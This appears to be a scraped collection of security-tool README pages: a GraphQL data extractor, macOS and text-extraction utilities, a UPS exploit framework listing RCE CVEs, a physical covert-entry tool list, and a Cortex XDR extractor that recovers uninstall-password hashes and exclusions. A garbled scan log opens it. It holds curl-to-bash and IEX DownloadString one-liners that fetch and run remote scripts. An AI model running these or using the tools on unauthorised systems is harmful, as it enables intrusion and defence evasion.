datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumb print="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
datetime="2023-03-06 20:17:59",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
datetime="2023-03-06 20:18:00",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject \certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
datetime="2023-03-06 20:31:59",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
datetime="2023-03-06 20:32:00",scan_id="f71277c 5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
datetime="2023-03-06 20:32:00",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
datetime="2023-03-06 20:32:01",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
datetime="2023-03-06 20:32:02",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subjec t_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha 256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
datetime="2023-03-06 20:33:46",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192. 168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
datetime="2023-03-06 20:33:47",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"


Graphicator - A GraphQL Enumeration And Extraction Tool


Graphicator is a GraphQL "scraper" / extractor. The tool iterates over the introspection document returned by the targeted GraphQL endpoint, then restructures the schema into an internal form so it can re-create the supported queries. Once those queries are created, it uses them to send requests to the endpoint and saves each returned response to a file.

Erroneous responses are not saved. By default the tool caches both the correct responses and the errors, so when re-running the tool it won't issue the same queries again.

Use it wisely and use it only for targets you have the permission to interact with.

We hope the tool automates your tests as a penetration tester and gives a push even to those who don't test GraphQL yet.

To learn how to perform assessments on GraphQL endpoints: https://cybervelia.com/?p=736&preview=true


Installation

Install on your system

python3 -m pip install -r requirements.txt

Using a container instead

docker run --rm -it -p8005:80 cybervelia/graphicator --target http://the-target:port/graphql --verbose

When the task is done, it zips the results and serves the zip via a webserver on port 8005. To kill the container, press CTRL+C. When the container is stopped, the data is deleted too. You may change the host port according to your needs.

Usage

python3 graphicator.py [args...]

Setting up a target

The first step is to configure the target. To do that you have to provide either a --target option or a file using --file.

Setting a single target via arguments

python3 graphicator.py --target https://subdomain.domain:port/graphql

Setting multiple targets

python3 graphicator.py --target https://subdomain.domain:port/graphql --target https://target2.tld/graphql

Setting targets via a file

python3 graphicator.py --file file.txt

The file should contain one URL per line as such:

http://target1.tld/graphql
http://sub.target2.tld/graphql
http://subxyz.target3.tld:8080/graphql

Using a Proxy

You may connect the tool with any proxy.

Connect to the default burp settings (port 8080)

python3 graphicator.py --target target --default-burp-proxy

Connect to your own proxy

python3 graphicator.py --target target --use-proxy

Connect via Tor

python3 graphicator.py --target target --use-tor

Using Headers

python3 graphicator.py --target target --header "x-api-key:60b725f10c9c85c70d97880dfe8191b3"

Enable Verbose

python3 graphicator.py --target target --verbose

Enable Multi-threading

python3 graphicator.py --target target --multi

Disable warnings for insecure and self-signed certificates

python3 graphicator.py --target target --insecure

Avoid using cached results

python3 graphicator.py --target target --no-cache

Example

python3 graphicator.py --target http://localhost:8000/graphql --verbose --multi

_____ __ _ __
/ ___/____ ___ _ ___ / / (_)____ ___ _ / /_ ___ ____
/ (_ // __// _ `// _ \ / _ \ / // __// _ `// __// _ \ / __/
\___//_/ \_,_// .__//_//_//_/ \__/ \_,_/ \__/ \___//_/
/_/

By @fand0mas

[-] Targets: 1
[-] Headers: 'Content-Type', 'User-Agent'
[-] Verbose
[-] Using cache: True
************************************************************
0%| | 0/1 [00:00<?, ?it/s][*] Enumerating... http://localhost:8000/graphql
[*] Retrieving... => query {getArticles { id,title,views } }
[*] Retrieving... => query {getUsers { id,username,email,password,level } }
100%|█████████████████████████████████████████████| 1/1 [00:00<00:00, 35.78it/s]
$ cat reqcache-queries/9652f1e7c02639d8f78d1c5263093072fb4fd06c.query 
query {getUsers { id,username,email,password,level } }

Output Structure

Three folders are created:

  • reqcache: The response of each valid query is stored in JSON format
  • reqcache-intro: All introspection queries are stored in a separate file in this directory
  • reqcache-queries: All queries are stored in a separate file in this directory. The filename of each query will match with the corresponding filename in the reqcache directory that holds the query's response.

The filename is a hash computed over the query and the URL.
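The exact hashing scheme is not spelled out here, but the 40-character hex filenames are consistent with SHA-1. A minimal sketch under that assumption (not confirmed against the tool's source):

import hashlib

def cache_filename(url, query):
    # Assumed scheme: SHA-1 over the URL plus the query text
    return hashlib.sha1((url + query).encode()).hexdigest() + ".query"

print(cache_filename("http://localhost:8000/graphql",
                     "query {getUsers { id,username,email,password,level } }"))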

License & EULA

Copyright 2023 Cybervelia Ltd

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Maintainer

The tool has been created and is maintained by (@fand0mas).

Contribution is also welcome.



MacOSThreatTrack - Bash Tool Used For Proactive Detection Of Malicious Activity On macOS Systems


The tool is being tested in the beta phase, and it only gathers macOS system information at this time.

The code is poorly organized and requires significant improvements.

Description

Bash tool used for proactive detection of malicious activity on macOS systems.

I was inspired by Venator-Swift and decided to create a bash version of the tool.

OneLiner command

curl https://raw.githubusercontent.com/ab2pentest/MacOSThreatTrack/main/MacOSThreatTrack.sh | bash

Gathered information

[+] System info
[+] Users list
[+] Environment variables
[+] Process list
[+] Active network connections
[+] SIP status
[+] GateKeeper status
[+] Zsh history
[+] Bash history
[+] Shell startup scripts
[+] PF rules
[+] Periodic scripts
[+] CronJobs list
[+] LaunchDaemons data
[+] Kernel extensions
[+] Installed applications
[+] Installation history
[+] Chrome extensions

Todo

  1. Saving output as JSON instead of printing out the result.


DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers And More From Text


 DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Git

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated PowerShell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Website

Here I use wget to make a request to stackoverflow, then forward the body text to ds. The -F option lists all files found. --clean removes any extra text that might have been returned (such as extra HTML). The result is then piped to uniq, which removes any duplicate files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all MAC addresses found in autodeauth's log file using the -m query. The --hide option hides the identifier string in front of the results; in this case 'mac_address: ' is hidden from the output. The -T option checks the same line multiple times for matches; normally, when a match is found, the tool moves on to the next line rather than checking it again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below reads all files in the current directory recursively. The -D option displays the filename (-f is required for the filename to display) and -e searches for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. It's also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was run 3 times and the average time recorded.

Computer Specs

Processor: Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 MHz, 6 Core(s), 12 Logical Processor(s)
RAM: 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22s 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directory searching mode
  • Base64 Detection and decoding


Thunderstorm - Modular Framework To Exploit UPS Devices


Thunderstorm is a modular framework to exploit UPS devices.

For now, only the CS-141 and NetMan 204 exploits are available. The beta version of the framework will be released in the future.


CVE

Thunderstorm is currently capable of exploiting the following CVE:

  • CVE-2022-47186 – Unrestricted file Upload # [CS-141]
  • CVE-2022-47187 – Cross-Site Scripting via File upload # [CS-141]
  • CVE-2022-47188 – Arbitrary local file read via file upload # [CS-141]
  • CVE-2022-47189 – Denial of Service via file upload # [CS-141]
  • CVE-2022-47190 – Remote Code Execution via file upload # [CS-141]
  • CVE-2022-47191 – Privilege Escalation via file upload # [CS-141]
  • CVE-2022-47192 – Admin password reset via file upload # [CS-141]
  • CVE-2022-47891 – Admin password reset # [NetMan 204]
  • CVE-2022-47892 – Sensitive Information Disclosure # [NetMan 204]
  • CVE-2022-47893 – Remote Code Execution via file upload # [NetMan 204]

Requirements

  • Python 3
  • Install requirements.txt

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Thunderstorm

Also, you probably need to download the original and the custom firmware. You can download all requirements from here: https://darkbyte.net/links/thunderstorm.php

Usage

- To be disclosed

The detailed guide of use can be found at the following link:

  • To be disclosed

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry

 

***The links of the products may change with time, if so, just ping me on twitter so I can update them. None of the links are affiliated or sponsored. Also, I have personally purchased almost every single item from this list out of my own pocket based on needs for engagements. If there are any other items that are not on this list and you believe they should be, feel free to DM or ping me on twitter (@DavidProbinsky) and I can add them.***


Commonly used tools for Red Teaming Engagements, Physical Security Assessments, and Tactical Covert Entry.

In this list I decided to share most of the tools I utilize in authorized engagements, including where to find some of them, and in some cases I will also include some other alternative tools. I am not providing information on how to use these tools, since this information can be found online with some research. My goal with this list is to help fellow Red Teamers with a 'checklist', for whenever they might be missing a tool, and use this list as a reference for any engagement. Stay safe and legal!!



Recon Tool Where to find Alternative
1. Camera with high zoom Recommended: Panasonic Lumix FZ-80 with 60x Zoom Camera Alternative: If not the Panasonic, you can use others. There are many other good cameras in the market. Try to get one with a decent zoom, any camera with over 30x Optical Zoom should work just fine.
1.1 Polarized Camera Filters Recommended: Any polarized filter that fits the lens of your camera. Alternatives: N/A.
2. Body Worn Action Camera Recommended: GoPro cameras or the DJI Osmo Action cameras Alternatives: There are other cheaper alternative action cameras that can be used, however the videos may not have the highest quality or best image stabilization, which can make the footage seem wobbly or too dark.
3. Drone with Camera Recommended: DJI Mavic Mini Series or any other drone that fits your budget. N/A
4. Two-Way Radios or Walkie Talkies Recommended: BaoFeng UV-5R Alternatives would be to just use cellphones and bluetooth headsets and a live call, however with this option you will not be able to listen to local radio chatter. A cell phone serves the purpose of being able to communicate with the client in case of emergency.
5. Reliable flashlight Amazon, Ebay, local hardware store If you want to save some money, you can always use the flashlight of your cellphone, however some phones can't decrease the brightness intensity.
6. Borescope / Endoscope Recommended: USB Endoscope Camera There are a few other alternatives, varying in price, size, and connectivity.
7. RFID Detector Recommended: One good benefit of the Dangerous Things RFID Diagnostics Card is that it's the size of a credit card, so it fits perfectly in your wallet for EDC use. Cheaper Alternative: The RF Detector by ProxGrind can be used as a keychain.
8. Alfa AWUS036ACS 802.11ac Recommended: Alfa AWUS036ACS N/A
9. CANtenna N/A Yagi Antennas also work the same way.



LockPicking & Entry Tools Recommended Alternatives
10. A reliable ScrewDriver with changeable bits Recommended: Wera Kraftform Alternative: Any other screwdriver set will work just fine. Ideally a kit which can be portable and with different bits
11. A reliable plier multitool Recommended: Gerber Plier Multitool Alternatives: any reliable multitool of your preference
12. Gaffer Tape Recommended because of its portability: Red Team Tools Gaffer Tape Alternatives: There are many other options on Amazon, but they are all larger in size.
13. A reliable set of 0.025 thin lockpick set Recommended to get a well known brand with good reputation and quality products. Some of those are: TOOOL, Sparrows, SouthOrd, Covert Instruments N/A. You do not want a pick breaking inside of a client's lock. Avoid sets that are of unknown brands from ebay.
14. A reliable set of 0.018 thin lockpick set Recommended to get a well known brand with good reputation and quality products. Some of those are: TOOOL, Sparrows, SouthOrd, Covert Instruments N/A.
15. Tension bars Recommended: Covert Instruments Ergo Turner Set or Sparrows Flatbars There are many other alternatives, varying in sizes and lengths. I strongly recommend having them in varying widths.
16. Warded picks Recommended: Red Team Tools Warded Lock Picks Alternative: Sparrows Warded Pick Set
17. Comb picks Recommended: Covert Instruments Quad Comb Set Alternative options: Sparrows Comb .45 and the Red Team Tools Comb Picks
18. Wafer picks Recommended: Red Team Tools Wafer Picks Alternatives: Sparrows Warded & Wafer Picks with Case
19. Jigglers Recommended: Red Team Tools Jiggler Alternatives: Sparrows Coffin Keys
20. Dimple lockpicks Recommended: Sparrows Black Flag Alternatives: The "Lishi" of Dimple locks Dangerfield Multi-Dimple Lock Picking Tool - 'The Gamechanger'
21. Tubular lockpicks Recommended: Red Team Tools Quick-Connect Tubular Lockpick Alternative: If you are very skilled at picking, you can go the manual route of tensioning and single pin picking, but it will take a lot longer to open the lock. With the Sparrows Goat Wrench you are able to do so.
22. Disk Pick Recommended: Sparrows Disk Pick N/A
23. Lock Lubricant Powdered Graphite found on Ebay or Amazon can get the job done. N/A
24. Plug spinner Recommended: Red Team Tools Peterson Plug Spinner Alternative: LockPickWorld GOSO Pen Style Plug Spinner
25. Hinge Pin Removal Tool Recommended: Red Team Tools Hammerless Hinge Pin Tool Here are some other alternatives: Covert Instruments Hinge Pin Removal Tools
26. PadLock Shims Recommended: Red Team Tools Padlock Shims 5-Pack Alternative: Covert Instruments Padlock Shims 20-pack
27. Combination lock decoders Recommended: Covert Instruments Decoder Bundle Alternative: Sparrows Ultra Decoder
28. Commercial door hook or Adams Rite Recommended: Covert Instruments Commercial Door Hook Alternative: Red Team Tools "Peterson Tools Adams Rite Bypass Wire" or the Sparrows Adams Rite Bypass Driver
29. Lishi Picks IYKYK N/A
30. American Lock Bypass Driver Recommended: Red Team Tools American Lock Padlock Bypass Driver Alternative: Sparrows Padlock Bypass Driver
31. Abus Lock Bypass Driver Recommended: N/A N/A



Bypass Tools Recommended Alternatives
32. Travelers hook Both Red Team Tools Travelers Hook and Covert Instruments Travelers Hook are solid options. N/A
33. Under Door Tool "UDT" Recommended: Sparrows UDT Alternative: Red Team Tools UDT
34. Camera film Recommended: Red Team Tools Film Canister N/A
35. Jim tool Recommended: Sparrows Quick Jim Alternative: Red Team Tools Rescue Jim
36. Crash bar tool "DDT" Recommended: Sparrows DDT Alternative: Serepick DDT
37. Deadbolt Thumb Turn tool Recommended: Both Covert Instruments J tool and Red Team Tools J Tool are solid options N/A
38. Door Latch shims Recommended: Red Team Tools Mica Door Shims Alternative: Covert Instruments Mica Door Shims
39. Strong Magnet Recommended: N/A The MagSwitches. Quick search online and you will find them.
40. Bump Keys Recommended: Sparrows Bump Keys N/A
41. Seattle RAT "SEA-RAT" Recommended: Seattle Rapid Access Tool Alternative: I've heard of the use of piano wire also, but I have not used it myself. IYKYK
42. Air Wedge Recommended: Covert Instruments Air Wedge N/A
43. Can of Compressed Air Recommended: Red Team Tools Air Canister Nozzle Head Cans of compressed air, usually found at your local stores
44. Proxmark3 RDV4 Recommended: Red Team Tools Proxmark RDV4 Alternative: Hacker Warehouse Proxmark3 RDV4
45. General use keys Recommended: Hooligan Keys - Devious, Troublesome, Hooligan! N/A
46. Alarm panels, Cabinets, other keys Recommended: Hooligan Keys Covert Instruments keys
47. Elevator Keys Recommended: Sparrows Fire Service Elevator Key Set N/A



Implants Recommended Alternatives
48. Rubber Ducky or Bash Bunny Recommended: HAK5 USB Rubber Ducky and the HAK5 Bash Bunny Alternatives: The USB Digispark.
49. DigiSpark No recommended links at the moment, but often found on overseas online sellers. It's a cheaper alternative to the Rubber Ducky or the Bash Bunny. Read more.
50. Lan Turtle HAK5 Lan Turtle N/A
51. Shark Jack Recommended: HAK5 Shark Jack N/A
52. Key Croc Recommended: HAK5 Key Croc N/A
53. Wi-Fi Pineapple Recommended: HAK5 WiFi Pineapple N/A
54. O.MG Plug Recommended: HAK5 O.MG Plug N/A
55. ESPKey Recommended: Red Team Tools ESPKey N/A



EDC Tools Recommended Alternatives
56. Pwnagotchi Recommended to build. Pwnagotchi Website. N/A
57. Covert Belt Recommended: Security Travel Money Belt N/A
58. Bogota LockPicks Recommended for EDC: Bogota PI N/A
59. Dog Tag Entry Tool set Recommended: Black Scout Survival Dog Tag N/A
60. Sparrows Wallet EDC Kit Recommended: Sparrows Chaos Card; Sparrows Chaos Card: Wary Edition; Sparrows Shimmy Card; Sparrows Flex Pass; Sparrows Orion Card N/A
61. SouthOrd Jackknife Recommended: SouthOrd Jackknife Alternative: SouthOrd Pocket Pen Pick Set
62. Covert Companion Recommended: Covert Instruments - Covert Companion N/A
63. Covert Companion Turning Tools Recommended: Covert Instruments - Turning Tools N/A



Additional Tools Recommended Alternatives
64. Ladders Easy to carry ladders, for jumping over fences and walls. N/A
65. Gloves Thick comfortable gloves, Amazon has plenty of them. N/A
66. Footwear It varies, depending if social engineering or not. If in the open field, use boots. N/A
67. Attire Dress up depending on the engagement. If in the field, use rugged strong clothes. If in an office building, dress accordingly. N/A
68. Thick wool blanket At least a 5x5 and 1 inch thick, or barbed wires will shred you. N/A
69. First Aid Kit Many kits available on Amazon. N/A



Suppliers or Cool sites to check Website N/A
Sparrows Lock Picks https://www.sparrowslockpicks.com/ N/A
Red Team Tools https://www.redteamtools.com/ N/A
Covert Instruments https://covertinstruments.com/ N/A
Serepick https://www.serepick.com/ N/A
Hooligan Keys https://www.hooligankeys.com N/A
SouthOrd https://www.southord.com/ N/A
Hak5 https://shop.hak5.org/ N/A
Sneak Technology https://sneaktechnology.com/ N/A
Dangerous Things https://dangerousthings.com/ N/A
LockPickWorld https://www.lockpickworld.com/ N/A
TIHK https://tihk.co/ N/A
Lost Art Academy https://lostartacademy.com/ N/A
Toool https://www.toool.us/ N/A
More coming soon! N/A


X-force - IBM Security Utility Library In Python. Search And Query All Sources: Threat_Activities And Groups, Malware_Analysis, Industries


IBM Security X-Force Exchange library in Python 3. Searches threat_activities, threat_groups, malware_analysis, collector, and industries.


Install

pip3 install XForce

Use

Use your API key pair for Basic authentication by base64-encoding Key + : + Password:

printf "d2f5f0f9-2995-42c6-b1dd-4c92252da129:06c41d5e-0604-4c7c-a599-300c367d2090" | base64
# ZDJmNWYwZjktMjk5NS00MmM2LWIxZGQtNGM5MjI1MmRhMTI5OjA2YzQxZDVlLTA2MDQtNGM3Yy1hNTk5LTMwMGMzNjdkMjA5MAo=
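The same token can be produced in Python; a small sketch using the example key/password pair from above:

import base64

key = "d2f5f0f9-2995-42c6-b1dd-4c92252da129"       # example key from above
password = "06c41d5e-0604-4c7c-a599-300c367d2090"  # example password from above
API_KEY = base64.b64encode(f"{key}:{password}".encode()).decode()
print(API_KEY)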

Then, using the resulting API_KEY, call the functions.

Call functions

import XForce

# Args: 1 - Term of search, 2 - API KEY

# Threat activity search, returns a string
XForce.threat_activities(Term, API_KEY)

# Malware analysis search, returns a string
XForce.malware_analysis(Term, API_KEY)

# Threat groups search, returns a string
XForce.threat_groups(Term, API_KEY)

# Industries search, returns a string
XForce.industries(Term, API_KEY)

# All-categories search, returns a list of dicts
XForce.collector(Term, API_KEY)  # assumed name, inferred from the "collector" source listed above

To see more details of a result, run:

from XForce import details

# Args: 1 - GUID, 2 - API KEY
# IMPORTANT: each GUID corresponds to its category
# All detail functions include:
# url → link to the X-Force Exchange panel
details.activity(Id, API_KEY)
details.group(Id, API_KEY)
details.malware(Id, API_KEY)
details.industry(Id, API_KEY)


Cortex-XDR-Config-Extractor - Cortex XDR Config Extractor


This tool is meant to be used during Red Team Assessments and to audit the XDR Settings.

With this tool it's possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.


Supported Extractions

  • Uninstall Password Hash & Salt
  • Excluded Signer Names
  • DLL Security Exclusions & Settings
  • PE Security Exclusions & Settings
  • Office Files Security Exclusions & Settings
  • Credential Gathering Module Exclusions
  • Webshell Protection Module Exclusions
  • Childprocess Executionchain Exclusions
  • Behavorial Threat Module Exclusions
  • Local Malware Scan Module Exclusions
  • Memory Protection Module Status
  • Global Hash Exclusions
  • Ransomware Protection Module Modus & Settings

Usage

Usage = ./XDRConfExtractor.py [Filename].ldb
Help = ./XDRConfExtractor.py -h

Getting Hold of Database Lock Files

Agent Version <7.8

With agent versions prior to 7.8, any authenticated user can generate a Support File on Windows via the Cortex XDR Console in the System Tray. The database lock files can be found within the zip:

